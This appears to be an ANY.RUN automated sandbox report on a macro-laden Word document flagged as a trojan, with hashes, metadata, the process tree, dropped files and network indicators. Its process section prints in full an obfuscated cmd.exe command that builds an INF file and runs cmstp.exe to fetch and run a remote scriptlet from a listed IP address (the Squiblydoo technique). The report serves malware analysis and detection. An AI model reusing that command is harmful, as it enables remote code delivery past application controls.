analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

82be69cea2306d7b62c49aef94e2bc40a913182e3c74a374f166e466f93b59b0.doc

Full analysis: https://app.any.run/tasks/b698e786-3dcb-4a46-b78f-5a360d43141a
Verdict: Malicious activity
Threats:

Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email.

Analysis date: March 21, 2019, 07:45:46
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
trojan
squiblydoo
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Admin, Template: Normal, Last Saved By: Admin, Revision Number: 5, Name of Creating Application: Microsoft Office Word, Total Editing Time: 02:00, Create Time/Date: Thu Jan 31 14:52:00 2019, Last Saved Time/Date: Wed Mar 20 11:47:00 2019, Number of Pages: 1, Number of Words: 4, Number of Characters: 23, Security: 0
MD5:

20C885469E3E6EA35E8C89C7FCC7E1A6

SHA1:

02B9DBA05A997AB7A21457AFADE8FAE9BADBC06F

SHA256:

82BE69CEA2306D7B62C49AEF94E2BC40A913182E3C74A374F166E466F93B59B0

SSDEEP:

3072:a4q5wi1Zsv4yeRR/ilTXZIx8lBHkTrVl:aPwKyeRR/ilT+00rV

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • SQUIBLYDOO was detected

      • cmstp.exe (PID: 3064)
  • SUSPICIOUS

    • Creates files in the user directory

      • cmd.exe (PID: 2316)
      • cmstp.exe (PID: 3064)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 1484)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 1484)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: Admin
Keywords: -
Comments: -
Template: Normal
LastModifiedBy: Admin
RevisionNumber: 5
Software: Microsoft Office Word
TotalEditTime: 2.0 minutes
CreateDate: 2019:02:28 14:52:00
ModifyDate: 2019:03:20 11:47:00
Pages: 1
Words: 4
Characters: 23
Security: None
CodePage: Windows Latin 1 (Western European)
Company:
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 26
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
34
Monitored processes
3
Malicious processes
1
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs cmd.exe no specs #SQUIBLYDOO cmstp.exe

Process information

PID
CMD
Path
Indicators
Parent process
1484"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\82be69cea2306d7b62c49aef94e2bc40a913182e3c74a374f166e466f93b59b0.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2316cmd /V /C set "O31=s" && !O31!et "O3=\" && !O31!et "O=e" && !O31!et "O88=i" && !O31!et "O0=A" && !O31!et "O06=N" && !O31!et "O16=d" && c!O0!ll !O31!et "O6=%!O0!PP!O16!!O0!T!O0!%" && c!O0!ll !O31!et "O21=%R!O0!!O06!!O16!OM%" && !O31!et "O2=!O6!!O3!M!O88!cro!O31!oft!O3!T!O!mplat!O!s!O3!!O21!.txt" && !O31!et "O04="^" && (For %i in ("[v!O!r!O31!ion]" "!O31!ignatur!O!=$Wi!O06!dow!O31! NTf7f81a39-5f63-5b42-9efd-1f13b5431005quot; "[D!O!faultIn!O31!tall_Singl!O!U!O31!er]" "UnR!O!gi!O31!t!O!rOCXs=O7" "[O7]" "%11%\%O23_1%%O23_2%%O23_3%,NI,%O93_1%%O93_2%%O93_3%%O93_4%%O93_5%%O93_6%%O93_7%%O93_8%%O93_9%%O93_10%%O93_11%%O93_12%%O93_13%%O93_14%" "[!O31!tring!O31!]" "O93_1=ht" "O93_2=tp" "O93_3=:/" "O93_4=/1" "O93_5=34" "O93_6=.2" "O93_7=09" "O93_8=.8" "O93_9=8." "O93_10=23" "O93_11=/q" "O93_12=we" "O93_13=.t" "O93_14=xt" "O23_2=rO" "O23_1=sC" "O23_3=bJ" ) do @echo %~i)>"!O2!" && echo !O31!erv!O88!ceNam!O!=!O04! !O04!>>!O2! && echo !O31!hortSvcN!O0!me=!O04! !O04!>>!O2! && c!O0!ll !O31!et "O64=%WI!O06!!O16!IR%" && !O31!t!O0!rt "" !O64!!O3!Sy!O31!t!O!m32!O3!cm!O31!tp.!O!x!O! /s /ns "!O2!"C:\Windows\system32\cmd.exewmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3064C:\Windows\System32\cmstp.exe /s /ns "C:\Users\admin\AppData\Roaming\Microsoft\Templates\19365.txt"C:\Windows\System32\cmstp.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Connection Manager Profile Installer
Exit code:
0
Version:
7.02.7600.16385 (win7_rtm.090713-1255)
Total events
1 102
Read events
737
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
0
Text files
5
Unknown types
4

Dropped files

PID
Process
Filename
Type
1484WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR8738.tmp.cvr
MD5:
SHA256:
1484WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$be69cea2306d7b62c49aef94e2bc40a913182e3c74a374f166e466f93b59b0.docpgc
MD5:CDFE6EC1AC3426DD7C20A99E3D1F6BE0
SHA256:FD59A198CD4EDB1E19C508DFB5CAE7DBC80A5E2D0699D5077380284880F828D2
1484WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:49D078DFAB25D5E3C9BA0DC7191EB69E
SHA256:C4A3368F95BC9CFC3F1A19EBDBC1D83299047F14178D10D8BC1B5B778FC23B4C
1484WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A17B8F65.wmfwmf
MD5:A49CC6FF4099CEF553812A4143115C8E
SHA256:B1AA10A4DF1A8F433C600A3F535FA01042D7A15A37C692E2CAB1806CCBEC38E9
3064cmstp.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\qwe[1].txtxml
MD5:DBDC47B12050E5025D62D07785DBE0CB
SHA256:1953B4CCC9C0A0CCB0FDC5FEEA6450841F345135FCA3456954B660E4A1875343
1484WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\SystemMonitor.exdtlb
MD5:5E7BE1DD25250F394C648D5846E6F8C6
SHA256:7E2E3062C6847B98107CF23F299974899BEC8B881DBFBD047CE0887DA46581DD
2316cmd.exeC:\Users\admin\AppData\Roaming\Microsoft\Templates\19365.txtini
MD5:D551FD7062E439A696492171F98EB3A3
SHA256:DA08351507C7658718CF298CFB41124FC3429D8739201BF5C8111499498A6866
3064cmstp.exeC:\Users\admin\AppData\Roaming\Microsoft\Network\Connections\Cm\ .cmptext
MD5:3BA90BC2BE91258022E8E9284FB5CEC4
SHA256:E836930ACD8DA4B30ED4A530D451EFD0EE5F3F880D8EEAD7016DE4B3FE62C991
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
0
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3064
cmstp.exe
GET
200
134.209.88.23:80
http://134.209.88.23/qwe.txt
US
xml
512 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3064
cmstp.exe
134.209.88.23:80
US
malicious

DNS requests

No data

Threats

PID
Process
Class
Message
3064
cmstp.exe
A Network Trojan was detected
MALWARE [PTsecurity] Squiblydoo Scriptlet
1 ETPRO signatures available at the full report
No debug info